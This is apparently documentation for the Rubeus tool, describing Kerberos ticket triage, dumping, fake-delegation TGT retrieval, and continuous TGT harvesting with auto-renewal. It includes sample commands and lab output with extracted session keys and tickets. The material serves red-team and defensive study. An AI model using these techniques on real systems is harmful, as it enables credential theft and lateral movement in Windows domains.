Breakdown of the ticket extraction/harvesting commands:
The triage, klist, and dump commands give increasing amounts of ticket detail.
triage
The triage action will output a table of the current user's Kerberos tickets, if not elevated. If run from an elevated context, a table describing all Kerberos tickets on the system is displayed. Ticket can be filtered for a specific service with /service:SNAME.
If elevated, tickets can be filtered for a specific LogonID with /luid:0xA.. or a specific user with /user:USER. This can be useful when triaging systems with a lot of Kerberos tickets.
The klist will list detailed information on the current user's logon session and Kerberos tickets, if not elevated. If run from an elevated context, information on all logon sessions and associated Kerberos tickets is displayed. Logon and ticket information can be displayed for a specific LogonID with /luid:0xA.. (if elevated).
Listing the current (non-elevated) user's logon session and Kerberos ticket information:
The dump action will extract current TGTs and service tickets if in an elevated context. If not elevated, service tickets for the current user are extracted. The resulting extracted tickets can be filtered by /service (use /service:krbtgt for TGTs) and/or logon ID (the /luid:0xA.. parameter). The KRB-CRED files (.kirbis) are output as base64 blobs and can be reused with the ptt function, or Mimikatz's kerberos::ptt functionality.
Note: if run from a non-elevated context, the session keys for TGTs are not returned (by default) from the associated APIs, so only service tickets extracted will be usable. If you want to (somewhat) workaround this, use the tgtdeleg command.
Extracting the current user's usable service tickets:
The tgtdeleg using @gentilkiwi's Kekeo trick (tgt::deleg) that abuses the Kerberos GSS-API to retrieve a usable TGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a handle to the current user's Kerberos security credentials, and InitializeSecurityContext() with the ISC_REQ_DELEGATE flag and a target SPN of HOST/DC.domain.com to prepare a fake delegate context to send to the DC. This results in an AP-REQ in the GSS-API output that contains a KRB_CRED in the authenticator checksum. The service ticket session key is extracted from the local Kerberos cache and is used to decrypt the KRB_CRED in the authenticator, resulting in a usable TGT .kirbi.
If automatic target/domain extraction is failing, a known SPN of a service configured with unconstrained delegation can be specified with /target:SPN.
C:\Rubeus>Rubeus.exe tgtdeleg
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'HOST/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'HOST/PRIMARY.testlab.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...
monitor
The monitor action will periodically extract all TGTs every /monitorinterval:X seconds (default of 60) and display any newly captured TGTs. A /targetuser:USER can be specified, returning only ticket data for said user. This function is especially useful on servers with unconstrained delegation enabled ;)
When the /targetuser:USER (or if not specified, any user) creates a new 4624 logon event, any extracted TGT KRB-CRED data is output.
The /nowrap flag causes the base64 encoded ticket output to no wrap per line.
If you want monitor to run for a specific period of time, use /runfor:SECONDS.
Further, if you wish to save the output to the registry, pass the /registry flag and specfiy a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). Then you can remove this entry after you've finished running Rubeus by Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.
Note that this action needs to be run from an elevated context!
harvest
The harvest action takes monitor one step further. It periodically extract all TGTs every /monitorinterval:X seconds (default of 60), extracts any new TGT KRB-CRED files, and keeps a cache of any extracted TGTs. Every interval, any TGTs that will expire before the next interval are automatically renewed (up until their renewal limit). Every /displayinterval:X seconds (default of 1200) and the current cache of "usable"/valid TGT KRB-CRED .kirbis are output as base64 blobs.
This allows you to harvest usable TGTs from a system without opening up a read handle to LSASS, though elevated rights are needed to extract the tickets.
The /nowrap flag causes the base64 encoded ticket output to no wrap per line.
If you want harvest to run for a specific period of time, use /runfor:SECONDS.
Further, if you wish to save the output to the registry, pass the /registry flag and specfiy a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). Then you can remove this entry after you've finished running Rubeus by Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.
c:\Rubeus>Rubeus.exe harvest /interval:30
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v0.0.1a
[*] Action: TGT Harvesting (w/ auto-renewal)
[*] Monitoring every 30 minutes for 4624 logon events
...(snip)...
[*] Renewing TGT for dfm.a@TESTLAB.LOCAL
[*] Connecting to 192.168.52.100:88
[*] Sent 1520 bytes
[*] Received 1549 bytes
[*] 9/17/2018 6:43:02 AM - Current usable TGTs:
User : dfm.a@TESTLAB.LOCAL
StartTime : 9/17/2018 6:43:02 AM
EndTime : 9/17/2018 11:43:02 AM
RenewTill : 9/24/2018 2:07:48 AM
Flags : name_canonicalize, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFujCCBbagAw...(snip)...
Note that this action needs to be run from an elevated context!
Command
Description
triage
LUID, username, service target, ticket expiration
klist
Detailed logon session and ticket info
dump
Detailed logon session and ticket data
tgtdeleg
Retrieve usable TGT for non-elevated user
monitor
Monitor logon events and dump new tickets
harvest
Same as monitor but with auto-renewal functionality